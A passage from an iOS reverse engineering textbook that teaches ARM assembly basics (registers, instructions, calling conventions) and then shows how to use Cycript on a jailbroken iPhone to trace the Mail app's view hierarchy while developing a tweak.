meaningful so that we can achieve our goals by guessing the functions of class- dump headers, 
then test them with Cycript and Theos. Although the methodology in this chapter is kind of 
“dirty” , it offers a totally different view from App development, which refreshes our mind and 
broadens our horizon.  
As beginners of iOS reverse engineering, our main purpose is to get familiar with jailbreak 
environment and knowledge points in previous chapters. Also, we need to master the usage of a 
variety of tools and deliberately cultivate our t hinking patterns on reverse engineering. If you 
have a lot of free time, I strongly recommend you to browse all class -dump headers and test the 
private methods you are interested in, which will greatly enhance your familiarity with low -
level iOS and help y ou yield twice the result with half the effort after you learn IDA and LLDB. 
As long as we try to think reversely and practice more, we can surely summarize effective 
methodologies of ourselves, which helps us step onto a higher level both on iOS reverse 
engineering and App development.  
 
  
178  
ARM related iOS reverse engineering  
 
 
In previous chapters we have already introduced the fundamental knowledge and tool 
usage in iOS reverse engineering. Now, you should be able to satisfy your curiosity by playing 
with private methods and develop some mini tweaks. However, since you ’ve come so far, I 
believe you have a strong delving spirit and truly want to improve your programmatic ability. If 
so, it ’d be better for you to try something more challenging. W ell, starting from this chapter, 
iOS reverse engineering will enter polar night, and you ’ll have to face the most arcane yet 
magical hieroglyphics in the programming world. Take a deep breath first, and then ask 
yourself, “ Is iOS reverse engineering a right choice for me? ” After finishing this chapter, 
hopefully you will get the answer.  
Next, we’ ll meet the first advanced challenge in iOS reverse engineering: reading ARM 
assembly. According to the previous chapters, you have already got the idea that Object ive-C 
code would become machine code after compiling, and then will be executed directly by CPU. 
It is overwhelming work to read machine code let alone write them. However, it ’s lucky that 
there is assembly, which bridges Objective -C code with machine code . Even though the 
readability of assembly is not as good as Objective -C, it’s much better than machine code. If you 
can crash this hard nut, congratulations, you have the talents to be a reverse engineer. Conversely, if you cannot, AppStore may suit you be tter. 
6.1   Introduction to ARM assembly  
ARM assembly is a brand new language to most iOS developers. If your major in college is 
computer related, you may already have some impression about assembly. Actually, assembly is 
too esoteric for most college students ; we’ re nervous and uncomfortable dealing with it. Is 
assembly really too hard to learn? Yes, it ’s obscure and difficult to understand. On the other 
6 
  
 
179 hand, however, as a human readable language, it is no much difference with other human 
languages, namely, i f we use it more often, we will get familiar with it quicker.  
As App developers, chances are rare for us to deal with assembly in our daily work. In this 
situation, if we don ’t practice deliberately, we cannot handle it for sure. In a nutshell, it ’s all 
about whether our time and energy is poured into learning it. Well, iOS reverse engineering 
offers us a great chance to learn ARM assembly. When we ’re reversing a function, we need to 
analyze massive lines of ARM assembly, and translate them to high -level language manually to 
reconstruct the functions. Even though there is no need to write assembly yet, a vast reading 
will definitely improve our understanding of it. ARM assembly is a necessity in iOS reverse 
engineering; you have to master it if you really wa nt to be a member of this field. Like English, 
basic ARM assembly concepts correspond to 26 letters and phonetic symbols in English; its 
instructions correspond to words, and instructions’  variants correspond to different word tenses; 
its calling conventio ns correspond to grammars, which define the connection between words. 
Sounds not that bad, right? Let ’s delve into it step by step.  
6.1.1   Basic concepts  
For a thorough introduction to ARM assembly, the ARM Architecture Reference Manual 
does a great job. However,  as rookies, most of us don ’t need a thorough introduction at all, the 
thousands pages ARM Architecture Reference Manual is no better than my limited knowledge 
about ARM assembly, which is enough and fits junior iOS reverse engineers better. With the 
release of iPhone 5s, Apple brings in the more powerful 64 -bit processor, arm64. However, the 
tools introduced in the previous chapters do not fully support arm64. Therefore, the following chapters will still focus on 32 -bit processors, i.e. armv7 and armv7s. N onetheless, the general 
methods and thoughts work on both 32- bit and 64 -bit processors.  
•  Register, memory, and stack 
In high -level languages like Objective -C, C, and C++, our operands are variables; whereas 
in ARM assembly, the operands are registers, memory, and stack. Registers can be regarded as 
CPU built -in variables; their amounts are often very limited. If we need more variables, we can 
put them in memory. However, this is a trade off between performance and amounts; memory operation is slower tha n register operation. 
 
180 In fact, stack is in memory as well. But it works like a stack, i.e. follows the “first in last out”  
rule. The stack of ARM is full descending, meaning that the stack grows towards lower address, 
the latest object is placed at the bot tom, which is at the lowest address, as shown in the figure 6 -
1. 
  
Figure 6- 1 The stack of ARM  
A register, named “stack pointer ” (hereafter referred to as SP), holds the bottom address of 
stack, i.e. the stack address. We can push a register into stack to save its value, or pop a register 
out of stack to load its value. During process running, SP changes a lot, but before and after a 
block of code is executed, SP should stay the same, otherwise there will be a fatal problem. 
Why? Let ’s take an example: 
static int global_var0; 
static int global_var1; 
 
... 
 
void foo(void)  
{ 
 bar(); 
 // other operations;  
} 
In the above code snippet, suppose that foo() uses registers A, B, C, and D; foo() calls bar(), 
and suppose that bar() uses registers A, B, and C. Because registers A, B and C are overlapped in 
foo() and bar(), bar() needs to save values of A, B, and C int o stack before it starts execution. 

 
181 Also, it needs to restore these 3 registers from stack before it ends execution, to make sure foo() 
can work correctly. Let ’s look at some pseudo code:  
// foo()  
foo: 
 // Push A, B, C, D into stack, save their values  
 push    {A, B, C, D}   
 // Use A ~ D  
 move    A, #1        // A = 1   
 move    B, #2        // B = 2   
 move    C, #3        // C = 3  
 call    bar    
 move    D, global_var0       
 // global_var1 = A + B + C + D   
 add     A, B        // A = A + B, notice A’ s value 
 add     A, C        // A = A + C, notice A’s value  
 add     A, D        // A = A + D, notice A’s value  
 move    global_var1, A  
 // Pop A, B, C, D out of stack, restore their values  
 pop     {A -D}    
 return   
 
// bar()  
bar:      
 // Push A 、B、C into the stack, store their values  
 push    {A -C}       
 // Use A ~ C    
 move    A, #2        // Do you know what this instruction do?  
 move    B, #5  
 move    C, A  
 add     C, B        // C = 7  
 // global_var0 = A + B + C (== 2 * C)   
 add     C, C  
 move    global_var0, C        // A = 2,B = 5,C = 14  
    
 // Do you get the meaning of push and pop now?  
 pop     {A -C}  
 return 
Let’s shortly explain this snippet of pseudo code: firstly, foo() sets registers A, B and C to 1, 2 
and 3 respectively, then calls bar(), which changes values of A, B and C as well sets global_var0, 
a global variable, to the sum of registers A, B and C. If we directly use the current values of A, B 
and C to calculate the value of global_var1 for now, then the result would be wrong. So  before 
executing bar(),values of A, B and C should be pushed into stack first, and pop them out after the execution of bar() for restoration, then we can get a correct global_var1. Notice that, for the 
same reason, foo() has done the same operations on A,  B, C and D, which saves its callers ’ days.  
•  Preserved registers 
Some registers in ARM processors must preserve their values after a function call, as shown 
below:  
 
182 R0-R3  Passes arguments and return values  
R7   Frame pointer, which points to the previously saved stack frame and the 
saved link register  
R9   Reserved by system before iOS 3.0  
R12   IP register,used by dynamic linker  
R13   Stack Pointer, i.e. SP  
R14   Link Register, i.e. LR, saves function return address  
R15   Program Counter, i.e. PC  
We’re not  writing ARM assembly yet, so treat the above table as a reference would be 
enough.  
•  Branches 
The process saves the address of the next instruction in PC register. Usually, CPU will 
execute instructions in order. When it has done with one instruction, PC wi ll increase 1 to point 
to the next instruction, as shown in figure 6 -2. 
  
Figure 6- 2 Execute instructions in order  
The processor will execute instructions from 1 to 5 in a plain and trivial way. However, if 
we change the value of PC, the execution order will be very different, as shown in figure 6 -3. 

 
183   
Figure 6- 3 Execute instructions out of order  
The instructions ’ execution has been disordered to 1, 5, 4, 2, 3 and 6, which is bizarre and 
remarkable. This kind of “disorder ” is officially called “branch ” or “jump” , which makes loop 
and subroutine possible. For example:  
// endless()  
endless:  
 operate    op1, op2  
 branch     endless  
 return     // D ead loop, we cannot reach here!  
In actual cases, conditional branches, which are triggered under some specific conditions, 
are the most practical branches. “if else ” and “ while ” are both based on conditional branches. In 
ARM assembly, there are 4 kinds of conditional branches:  
2  The result of operation is zero (or non-zero). 
2  The result of operation is negative. 
2  The result of operation has carry. 
2  The operation overflows (for example, the sum of two positive numbers exceeds 32 bits).  
These operation results are often represented as flags and are saved in the Program Status 
Register (PSR). Some instructions will change these flags according to their operation results, 
and conditional branches decide whether to branch according to these flags. The pseudo code 
below shows an example of for loop:  

 
184 for:  
 add        A, #1  
 compare    A, #16  
 bne        for  // If A - 16 != 0 th en jump to for  
The above code compares A and #16, if they ’re not equal, increase A by 1 and compare 
again. Otherwise break out the loop and go on to the next instruction.  
6.1.2   Interpretation of ARM/THUMB instructions  
ARM processors use 2 different instruction sets: ARM and THUMB. The length of ARM 
instructions is universally 32 bits, whereas it ’s 16 bits for THUMB instructions. Broadly, both 
sets have 3 kinds of instructions: data p rocessing instructions, register processing instructions, 
and branch instructions.  
•  Data processing instructions 
There ’re 2 rules in data processing instructions:  
2  All operands are 32 bits. 
2  All results are 32 bits, and can only be stored in registers.  
In a nutshell, the basic syntax of data processing instructions is:  
op{cond}{s} Rd, Rn, Op2  
“cond ” and “ s” are two optional suffixes. “cond ” decides the execution condition of “op”, 
and there are 17 conditions:  
EQ  The result equals to 0 (EQual to 0)  
NE  The result doesn’t equal to 0 (Not Equal)  
CS  The operation has carry or borrow (Carry Set)  
HS  Same to CS (unsigned Higher or Same)  
CC  The operation has no carry or borrow (Carry Clear)  
LO  Same to CC (unsigned LOwer)  
MI  The result is negative (MInus)  
PL  The result is greater than or equal to 0 (PLus)  
VS  The operation overflows (oVerflow Set)  
VC  The operation doesn’t overflow (oVerflow Clear)  
HI  If operand1 is unsigned HIgher than operand2  
LS  If operand1 is unsigned Lower or Same than operand2  
GE  If operand1 is signed Greater than or Equal to operand2  
LT  If operand1 is signed Less Than operand2  
GT  If operand1 is signed Greater Than operand2  
LE  If operand1 is signed Less than or Equal operand2  
AL  ALways,this is the default  
“cond ” is easy to use, for example:  
compare  R0, R1 
moveGE   R2, R0 
moveLT   R2, R1  
Compare R0 with R1, if R0 is greater than or equal to R1, then R2 = R0, otherwise R2 = R1.  
 
185  “s” decides whether “op” sets flags or not, there are 4 flags:  
N (Negative)  
If the re sult is negative then assign 1 to N, otherwise assign 0 to N.  
 
Z (Zero)  
If the result is zero then assign 1 to Z, otherwise assign 0 to Z.  
 
C (Carry)  
For add operations (including CMN), if they have carry then assign 1 to C, otherwise 
assign 0 to C; for su b operations (including CMP), Carry acts as Not -Borrow, if borrow 
happens then assign 0 to C, otherwise assign 1 to C; for shift operations (excluding add 
or sub), assign C the last bit to be shifted out; for the rest of operations, C stays 
unchanged.  
 
V (oVerflow)  
If the operation overflows then assign 1  to V, otherwise assign 0 to V.  
One thing to note, C flag works on unsigned calculations, whereas V flag works on signed 
calculations.  
Data processing instructions can be divided into 4 kinds:  
•  Arithmetic instructions 
ADD R0, R1, R2  ; R0 = R1 + R2 
ADC R0, R1, R2  ; R0 = R1 + R2 + C(arry) 
SUB R0, R1, R2   ; R0 = R1 - R2 
SBC R0, R1, R2   ; R0 = R1 - R2 - !C 
RSB R0, R1, R2   ; R0 = R2 - R1 
RSC R0, R1, R2   ; R0 = R2 - R1 - !C 
All arithmetic instructions are base d on ADD and SUB. RSB is the abbreviation of “Reverse 
SuB” , which just reverse the two operands of SUB; instructions end ing with “C” stands for ADD 
with carry or SUB with borrow, and they will assign 1 to C flag when there is carry or there isn ’t 
borrow.  
•  Logical operation instructions 
AND R0, R1, R2   ; R0 = R1 & R2  
ORR R0, R1, R2   ; R0 = R1 | R2  
EOR R0, R1, R2   ; R0 = R1 ^ R2  
BIC R0, R1, R2   ; R0 = R1 &~ R2  
MOV R0, R2   ; R0 = R2  
MVN R0, R2   ; R0 = ~R2  
There is not much to explain about these instructions with their corresponding C operators. 
You may have noticed that there ’s no shift instruction, because ARM uses barrel shift with 4 
instructions:  
LSL  Logical Shift Left, as shown in figure 6 -4 
 
186   
Figure 6- 4 LSL 
LSR  Logical Shift Right, as shown in figure 6-5 
  
Figure 6- 5 LSR  
ASR  Arithmetic Shift Right, as shown in figure 6 -6 
  
Figure 6- 6 ASR 
ROR  ROtate Right, as shown in figure 6 -7 
  
Figure 6- 7 ROR 
•  Compare instructions 
CMP R1, R2 ;  Set flag according to the result of R1 -  R2 
CMN R1, R2 ;  Set flag according to the result of R1 + R2 
TST R1, R2  ;  Set flag according to the result of R1 & R2  
TEQ R1, R2  ;  Set flag according to the result of R1 ^ R2  
Compare instructions are just arithmetic or logical operation instructions that change flags, 
but they d on’t save the results in registers. 
•  Multiply instructions 
MUL R4, R3, R2        ; R4 = R3 * R2  
MLA R4, R3, R2, R1   ; R4 = R3 * R2 + R1  
The operands of multiply instructions must come from registers.  

 
187 •  Register processing instructions 
The basic syntax of register processing instructions is:  
op{cond}{type} Rd, [Rn,  Op2] 
Rn, the base register, stores base address; the function of “cond ” is the same to data 
processing instructions; “type”  decides the data type which “ op” operates, there are 4 types: 
B (unsigned Byte)  
Extends to 32 bits when executing,filled with 0.  
 
SB (Signed Byte)  
For LDR only;extends to 32 bits when executing,filled with the sign bit.  
 
H (unsigned Halfword)  
Extends to 32 bits when executing,filled with 0.  
 
SH (Signed Halfword)  
For LDR only;extends to 32 bits when executing,filled with the sign bit.  
The default data type is word if no “type”  is specified.  
There are only 2 basic register processing instructions: LDR (LoaD Register), which reads 
data from memory then write to register; and STR (STore Register), which reads data from 
register then write to memory. They ’re used like this:  
2  LDR 
LDR Rt, [Rn {, #offset}]   ; Rt = *(Rn {+ offset}), {} is optional 
LDR Rt, [Rn, #offset]!   ; Rt = *(Rn + offset); Rn = Rn + offset 
LDR Rt, [Rn], #offset   ; Rt = *Rn; Rn = Rn + offset  
2  STR 
STR Rt, [Rn {, #offset}]   ; *(Rn {+ offset}) = Rt  
STR Rt, [Rn, #offset]!   ; *(Rn {+ offset}) = Rt; Rn = Rn + offset  
STR Rt, [Rn], #offset    ; *Rn = Rt; Rn = Rn + offset  
Besides, LDRD and STRD, th e variants of LDR and STR, can operate doubleword, namely, 
LDR or STR two registers at once. The syntax of them is:  
op{cond} Rt, Rt2, [Rn {, #offset}]  
The use of LDRD and STRD is just like LDR and STR:  
2  STRD 
STRD R4, R5, [R9,#offset]  ;  *(R9 + offset) = R4; *(R9  + offset + 4) = R5  
2  LDRD 
LDRD R4, R5, [R9,#offset]  ;  R4 = *(R9 + offset); R5 = *(R9 + offset + 4)  
Beside LDR and STR, LDM (LoaD Multiple) and STM (STore Multiple) can process several 
registers at the same time like this:  
op{cond}{mode} Rd{!}, reglist 
 
188 Rd is the base register, and the optional “!” decides whether the modified Rd is written back 
to the original Rd if “op” modifies Rd; reglist is a list of registers which are curly braced and 
separated by “,”, or we can use “-” to represent a scop e, such as {R4 – R6, R8} stands for R4, R5, 
R6 and R8; these registers are ordered according to their numbers, regardless of their positions 
inside the braces.  
Attention, the operation direction of LDM and STM is opposite to LDR and STR; LDM 
reads memory s tarting from Rd then write to reglist, while STM reads from reglist then write to 
memory starting from Rd. This is a little confusing; please don ’t mess up.  
The function of “cond ” is the same to data processing instructions. And, “mode ” specifies 
how Rd is  modified, including 4 cases:  
IA (Increment After)  
Increment Rd after “op”.  
 
IB (Increment Before)  
Increment Rd before “op”.  
 
DA (Decrement After)  
Decrement Rd after “op”.  
 
DB (Decrement Before)  
Decrement Rd before “op”.  
What do they mean? We will use LDM  as an example. As figure 6 -8 shows, R0 points to 5 
currently.  
  
Figure 6- 8 Simulation of LDM 
After executing the following instructions, R4, R5 and R6 will change to:  
LDMIA R0, {R4 –  R6}   ; R4 = 5, R5 = 6, R6 = 7 
LDMIB R0, {R4 –  R6}   ; R4 = 6, R5 = 7, R6 = 8 
LDMDA R0, {R4 – R6}   ; R4 = 5, R5 = 4, R6 = 3  
LDMDB R0, {R4 – R6}   ; R4 = 4, R5 = 3, R6 = 2  
STM works similarly. Notice again, the operation direction of LDM and STM is just 
opposite to LDR and STR. 

 
189 •  Branch instructions 
Branch instructions can be divided into 2 kinds: unconditional branches and conditional 
branches.  
2  Unconditional branches 
B Label   ; PC = Label  
BL Label   ; LR = PC – 4; PC = Label  
BX Rd          ; PC = Rd ,and switch instruction set  
Unconditional branches are easy to understand, f or example:  
foo(): 
 B Label   ; Jump to Label to keep executing  
 .......  ; Can’t reach here  
Label: 
 ....... 
2  Conditional branches  
The “cond ” of conditional branches are decided by the 4 flag mentioned in section 6.2.1, 
their correspondences are:  
cond        flag 
EQ  Z = 1 
NE  Z = 0 
CS  C = 1 
HS  C = 1 
CC  C = 0 
LO  C = 0 
MI  N = 1 
PL  N = 0 
VS  V = 1 
VC  V = 0 
HI  C = 1 & Z = 0  
LS  C = 0 | Z = 1  
GE  N = V 
LT  N != V 
GT  Z = 0 & N = V  
LE  Z = 1 | N != V  
Before every conditional branch there will be a data processing instruction to set the flag, 
which determines if the condition is met or not, hence influence the code execution flow.  
Label: 
 LDR R0, [R1], #4  
 CMP R0, 0   ; If R0 == 0 then Z = 1; else Z = 0  
 BNE Label   ; If Z == 0 then jump  
•  THUMB instructions 
THUMB instruction set is a subset of ARM instruction set. Every THUMB instruction is 16 
bits long, so THUMB instructions are more space saving than ARM instructions, and can be 
faster transferred on 16 -bit data bus. However, you can’ t make an omele t without breaking 
eggs. All THUMB instructions except “b” can’t be executed conditionally; barrel shift can ’t 
 
190 cooperate with other instructions; most THUMB instructions can only make use of registers R0 
to R7, etc. Compared with ARM instructions, the feat ures of THUMB instructions are:  
2  There’re less THUMB instructions than ARM instructions 
Since THUMB is just a subset, the number of THUMB instructions is definitely less. For 
example, among all multiply instructions, only MUL is kept in THUMB.  
2  No conditional execution 
Except branch instructions, other instructions cannot be executed conditionally.  
2  All THUMB instructions set flags by default 
2  Barrel shift cannot cooperate with other instructions  
Shift instructions can only be executed alone, say:  
LSL R0 #2 
But cannot:  
ADD R0, R1, LSL #2 
2  Limitation of registers 
Unless declared explicitly, THUMB instructions can only make use of R0 to R7. However, 
there are exceptions: ADD, MOV, and CMP can use R8 to R15 as operands; LDR and STR can 
use PC or SP; PUSH  can use LR, POP can use PC; BX can use all registers.  
2  Limitation of immediate values and the second operand  
Most of THUMB instructions ’ formats  are “op Rd, Rm ”, excluding shift instructions, ADD, 
SUB, MOV and CMP. 
2  Doesn’t support data write back 
All THUMB  instructions do not support data write back i.e. “!”, except LDMIA and STMIA.  
We will see the instructions mentioned above a lot during the junior stage of iOS reverse 
engineering. If you only have a smattering of the knowledge so far, take it easy. Get y our hands 
dirty and analyze several binaries from now on, you will gradually get familiar with ARM 
assembly. This section is just an introduction, if you have any questions about instructions in 
practice, ARM Architecture Reference Manual on http://infocenter.arm.com  will always be the 
best reference for you. Of course, things discussed on http://bbs.iosre.com  are also worth to 
have a look.  
 
191 6.1.3   ARM calling conventions  
After a brief l ook at the commonly used ARM instructions, I believe you can barely read the 
assembly of a function for now. When a function calls another function, arguments and return 
values need to be passed between the caller and the callee. The rule of how to pass th em is 
called ARM calling conventions.  
•  Prologs and epilogs 
We’ve mentioned in section 6.1.1 that “before and after a block of code is executed, SP 
should stay the same, otherwise there will be a fatal problem ”. This goal is achieved by the 
cooperation of prolog and epilog of this code block. Generally, prolog does these: 
2  PUSH LR; 
2  PUSH R7; 
2  R7 = SP; 
2  PUSH registers that must be preserved; 
2  Allocates space in the stack frame for local storage.  
And epilog does an opposite job to prolog:  
2  Deallocates space that the prolog allocates; 
2  POP preserved registers; 
2  POP R7; 
2  POP LR, and PC = LR. 
However, the work of prolog and epilog is not indispensable. If the code block doesn ’t make 
use of a register at all, then there is no need to push it onto stack. In iOS reverse engi neering, 
prologs and epilogs may change the value of SP, which deserves our attention. We ’ll come 
across this situation in chapter 10; review this section when you get there.  
•  Pass arguments and return values 
If you want to delve deeper into how arguments a nd return values are passed, you can read 
http://infocenter.arm.com/help/topic/com.arm.doc.ihi0042e/IHI0042E_aapcs.pdf . However, 
in the majorty of cases, you just need to remember “sentence of the book ”: 
 
192  “The first 4 arguments are saved in R0, R1, R2 and R3; the rest are saved on the stack; the 
return value is saved in R0. ” 
A concise but informative sentence, right? To make a deeper impression, let ’s see an 
example : 
// clang -arch armv7 -isysroot `xcrun --sdk iphoneos --show-sdk-path` -o MainBinary 
main.m 
 
#include <stdio.h>  
 
int main(int argc, char **argv)  
{ 
 printf("%d, %d, %d, %d, %d", 1, 2, 3, 4, 5);  
 return 6;  
} 
Save this code snippet as main.m, and compile it  with the sentence in comments. Then drag 
and drop MainBinary into IDA and locate to main, as shown in figure 6 -9. 
  
Figure 6- 9 main in assembly  
 “BLX _printf ” calls printf, and its 6 arguments are stored in R0, R1, R2, R3, [SP, #0x20 + 
var_20], and [SP, #0x20 + var_1C] respectively; the return value is stored in R0. Because var_20 
= -0x20,var_1C = -0x1C, 2 arguments in the stack are at [SP] and [SP, #0x4].  
I don ’t think we need further explanation.  
 “The first 4 arguments are saved in R0, R1, R2 and R3; the rest are saved on the stack; the 
return value is saved in R0. ” 

 
193 Promise me you ’ll remember “sentence of the book ”, which is the key to most problems in 
iOS reverse engineering!  
This section just walked you through the most basic knowledge about ARM assembly; there 
were omissions for sure. However, to be honest, with “sentence of the book ” and the official 
site of ARM, you can start reversing 99% of all Apps. Next, it ’s time for us to figure out how to 
use the knowledge we have just learned in practical iOS reverse engineering.  
6.2   Advanced methodology of writing a tweak  
In “Methodology of writ ing a tweak ” of chapter 5, we have concluded the methodology 
into 5 steps: 1. look for inspiration; 2. locate target files; 3. locate target functions; 4. test private 
methods; 5. analyze method arguments. These steps seem reasonable, but the most importan t 
step “ locate target functions ” is lame and untenable. Can we refer to “look for interesting 
keywords in class- dump headers ” as “locate target functions ”? No. 
In the vast majority of cases, only 2 elements of an App attract our interests: its function and  
its data. What if we discover an interesting function, but fail to find the related keywords in 
class- dump headers? And how can we track an interesting data till we know how it ’s generated? 
In these cases, class -dump is all thumbs. Thus, “ look for interesting keywords in class -dump 
headers ” is just one scenario in “locate target functions ”, we’ ve overgeneralized. Therefore, in 
more general cases, how should we locate target functions?  
Functions and data that we ’re interested in, are all presented in softwa re in some intuitive 
forms that we can see or feel. For example, figure 6 -10 shows Mail App (hereafter referred to as 
Mail), and the button at the right bottom has the function of composing an email; figure 6 -11 
shows phone settings view in Settings App (h ereafter referred to as MobilePhoneSettings), its 
top cell shows my number. App functions are provided by programmatic functions, and data is 
generated by programmatic functions as well. That ’s to say, from programmatic point of view, 
the nature of what we’ re interested in is programmatic functions. So, “locate target functions ” is 
actually the process of how we locate the source functions of our interested Apps ’ visual 
expressions. 
 
194   
Figure 6-  10 Mail 
  
Figure 6-  11 MobilePhoneSettings  
Facing such demands, class -dump is quite helpless. Luckily, we have already learned how to 
use Cycript, IDA and LLDB, and gained some basic knowledge about ARM assembly; with their 
help, there are patterns to follow for “locate target functions ”. For most of us, among all iOS 
software, we know Apps the best, so if we ’re to choose something as our junior reverse targets, 

 
195 nothing is more appropriate than Apps. As a result, in the following sections, we will take Apps 
as examples, and try to refine “locate tar get functions ” with ARM level reverse engineering, as 
well enhance the methodology of writing a tweak.  
6.2.1   Cut into the target App and find the UI function  
For an App, what we’ re interested in are regularly presented on UI, which exhibits 
execution processes a nd results. The relationship between function and UI is very tight, if we 
can get the UI object that interests us, we can find its corresponding function, which is referred 
to as “ UI function ”. The process of getting the programmatic UI object of our inter ested visual 
UI control object, then further getting the UI function of the programmatic UI object is usually implemented with Cycript, with the magic private method “recursiveDescription”  in UIView 
and the undervalued public method “nextResponder ” in UIRe sponder. In the rest of this 
chapter, I will explain this process by taking Mail as the example to summarize the 
methodology, and then apply the methodology to MobilePhoneSettings to give you a deeper 
impression. All the work is finished on iPhone 5, iOS 8 .1. 
1.   Inject Cycript into Mail 
Firstly use the skill mentioned in section “dumpdecrypted ” to locate the process name of 
Mail, and inject with Cycript:  
FunMaker- 5:~ root# ps - e | grep /Applications 
  363 ??         0:06.94 /Applications/MobileMail.app/MobileM ail 
  596 ??         0:01.50 
/Applications/MessagesNotificationViewService.app/MessagesNotificationViewService  
  623 ??         0:08.50 /Applications/InCallService.app/InCallService  
  713 ttys000    0:00.01 grep /Applications  
FunMaker -5:~ root# cycript -p MobileMail  
2.   Examine the view hierarchy of “Mailboxes” view, and locate “compose” 
button 
The private method [UIView recursiveDescription] returns the view hierarchy of UIView. 
Normally, the current view is consists of at least one UIWindow object, and UIWindow inherits 
from UIView, so we can use this private method to examine the view hierarchy of current view. 
Its usage follows this pattern:  
cy# ?expand  
expand == true 
 
196 First of all, execute “ ?expand ” in Cycript to turn on “ expand ”, so that Cycript will translate 
control characters such as “\n” to corresponding formats and give the output a better 
readability. 
cy# [[UIApp keyWindow] recursiveDescription]  
UIApp is the abbreviation of [UIApplication sharedApplication], they ’re equivalent. Calling 
the above method will print out view hierarchy of keyWindow, and output like this:  
@"<UIWindow: 0x14587a70; frame = (0 0; 320 568); gestureRecognizers = <NSArray: 
0x147166b0>; layer = <UIWindowLayer: 0x14587e30>>  
   | <UIView: 0x146e6180; frame = (0 0; 320 568); autoresize = W+H; gestureRecognizers = 
<NSArray: 0x146e98d0>; layer = <CALayer: 0x146e61f0>>  
   |    | <UIView: 0x146e5f60; frame = (0 0; 320 568); layer = <CALayer: 0x1460ec40>>  
   |    |    | <_MFActorItemView:  0x14506a30; frame = (0 0; 320 568); layer = <CALayer: 
0x14506c10>>  
   |    |    |    | <UIView: 0x145074b0; frame = ( -0.5 -0.5; 321 569); alpha = 0; layer 
= <CALayer: 0x14507520>>  
   |    |    |    | <_MFActorSnapshotView: 0x14506f70; baseClass = UISnapsh otView; frame 
= (0 0; 320 568); clipsToBounds = YES; hidden = YES; layer = <CALayer: 0x145071c0>>  
...... 
   |    | <MFTiltedTabView: 0x146e1af0; frame = (0 0; 320 568); userInteractionEnabled = 
NO; gestureRecognizers = <NSArray: 0x146f2dd0>; layer = <CALayer: 0x146e1d50>>  
   |    |    | <UIScrollView: 0x146bfa90; frame = (0 0; 320 568); gestureRecognizers = 
<NSArray: 0x146e1e90>; layer = <CALayer: 0x146c8740>; contentOffset: {0, 0}; 
contentSize: {320, 77.5}>  
   |    |    | <_TabGradientView: 0x146e7010; frame =  (-320 -508; 960 568); alpha = 0; 
userInteractionEnabled = NO; layer = <CAGradientLayer: 0x146e7d80>>  
   |    |    | <UIView: 0x146e29c0; frame = ( -10000 568; 10320 10000); layer = <CALayer: 
0x146e2a30>>"  
Description of every subview and sub -subview of keyWindow will be completely presented 
in <......>, including their memory addresses, frames and so on. The indentation spaces reflect 
the relationship between views. Views on the same level will have same indent ation spaces, 
such as UIScrollView, _TabGradientView and UIView at the bottom; and less indented views are the superviews of more indented views, for example, UIScrollView, _TabGradientView, and 
UIView are subviews of MFTiltedTabView. By using “#” in Cycript, we can get any view object 
in keyWindow like this:  
cy# tabView = #0x146e1af0  
#"<MFTiltedTabView: 0x146e1af0; frame = (0 0; 320 568); userInteractionEnabled = NO; 
gestureRecognizers = <NSArray: 0x146f2dd0>; layer = <CALayer: 0x146e1d50>>"  
Of course, through other methods of UIApplication and UIView, it is also feasible to get 
views we are interested in, for example:  
cy# [UIApp windows]  
@[#"<UIWindow: 0x14587a70; frame = (0 0; 320 568); gestureRecognizers = <NSArray: 
0x147166b0>; layer = <UIWindowLayer : 0x14587e30>>",#"<UITextEffectsWindow: 0x15850570; 
frame = (0 0; 320 568); opaque = NO; gestureRecognizers = <NSArray: 0x147503e0>; layer = 
<UIWindowLayer: 0x1474ff10>>"]  
The above code can get all windows of this App:  
 
197 cy# [#0x146e1af0 subviews]  
@[#"<UIS crollView: 0x146bfa90; frame = (0 0; 320 568); gestureRecognizers = <NSArray: 
0x146e1e90>; layer = <CALayer: 0x146c8740>; contentOffset: {0, 0}; contentSize: {320, 
77.5}>",#"<_TabGradientView: 0x146e7010; frame = ( -320 -508; 960 568); alpha = 0; 
userIntera ctionEnabled = NO; layer = <CAGradientLayer: 0x146e7d80>>",#"<UIView: 
0x146e29c0; frame = ( -10000 568; 10320 10000); layer = <CALayer: 0x146e2a30>>"]  
cy# [#0x146e29c0 superview]  
#"<MFTiltedTabView: 0x146e1af0; frame = (0 0; 320 568); userInteractionEnabled  = NO; 
gestureRecognizers = <NSArray: 0x146f2dd0>; layer = <CALayer: 0x146e1d50>>"  
The above code can get subviews and superviews. In a word, we can get any view objects 
that are visible on UI by combining the above methods, which lays the foundation for our next 
steps. 
In order to locate “compose ” button, we need to find out the corresponding control object. 
To accomplish this, the regular approach is to examine control objects one by one. For views 
like <UIView: viewAddress; ...>, we call [#viewAddress set Hidden:YES] for everyone of them, 
and the disappeared control object is the matching one. Of course, some tricks could accelerate the examination; because on the left side of this button there ’re two lines of sentences, we can 
infer that the button shares the same superview with this two sentences; if we can find out the 
superview, the rest of work is only examining subviews of this superview, hence reduce our 
work burden. Commonly, texts will be printed in description, so we can directly search “3 
Unsent M essages ” in recursiveDescription:  
   |    |    |    |    |    |    |    | <MailStatusUpdateView: 0x146e6060; frame = (0 0; 
182 44); opaque = NO; autoresize = W+H; layer = <CALayer: 0x146c8840>>  
   |    |    |    |    |    |    |    |    | <UILabel: 0x14609 610; frame = (40 21.5; 102 
13.5); text = ‘3 Unsent Messages’; opaque = NO; userInteractionEnabled = NO; layer = 
<_UILabelLayer: 0x146097f0>>  
Thereby, we get its superview, i.e. MailStatusUpdateView. If the button is a subview of 
MailStatusUpdateView, then  when we call [MailStatusUpdateView setHidden:YES], the button 
would disappear. Let ’s try it out:  
cy# [#0x146e6060 setHidden:YES]  
However, only the sentences are hidden, the button remains visible, as shown in figure 6 -12: 
 
198   
Figure 6- 12 Two lines of sente nces are hidden 
This indicates that the level of MailStatusUpdateView is lower than or equal to the button, 
right? So, next let ’s check the superview of MailStatusUpdateView. From recursiveDescription, 
we realize that its superview is MailStatusBarView:  
   |    |    |    |    |    |    | <MailStatusBarView: 0x146c4110; frame = (69 0; 182 
44); opaque = NO; autoresize = BM; layer = <CALayer: 0x146f9f90>>  
   |    |    |    |    |    |    |    | <MailStatusUpdateView: 0x146e6060; frame = (0 0; 
182 44); opaque  = NO; autoresize = W+H; layer = <CALayer: 0x146c8840>>  
Try to hide it and see if the button disappears:  
cy# [#0x146e6060 setHidden:NO]  
cy# [#0x146c4110 setHidden:YES]  
It’s disappointing; two sentences are hidden but not the button, which means that the level 
of MailStatusBarView is still not high enough, let ’s keep looking for its superview, i.e. 
UIToolBar:  
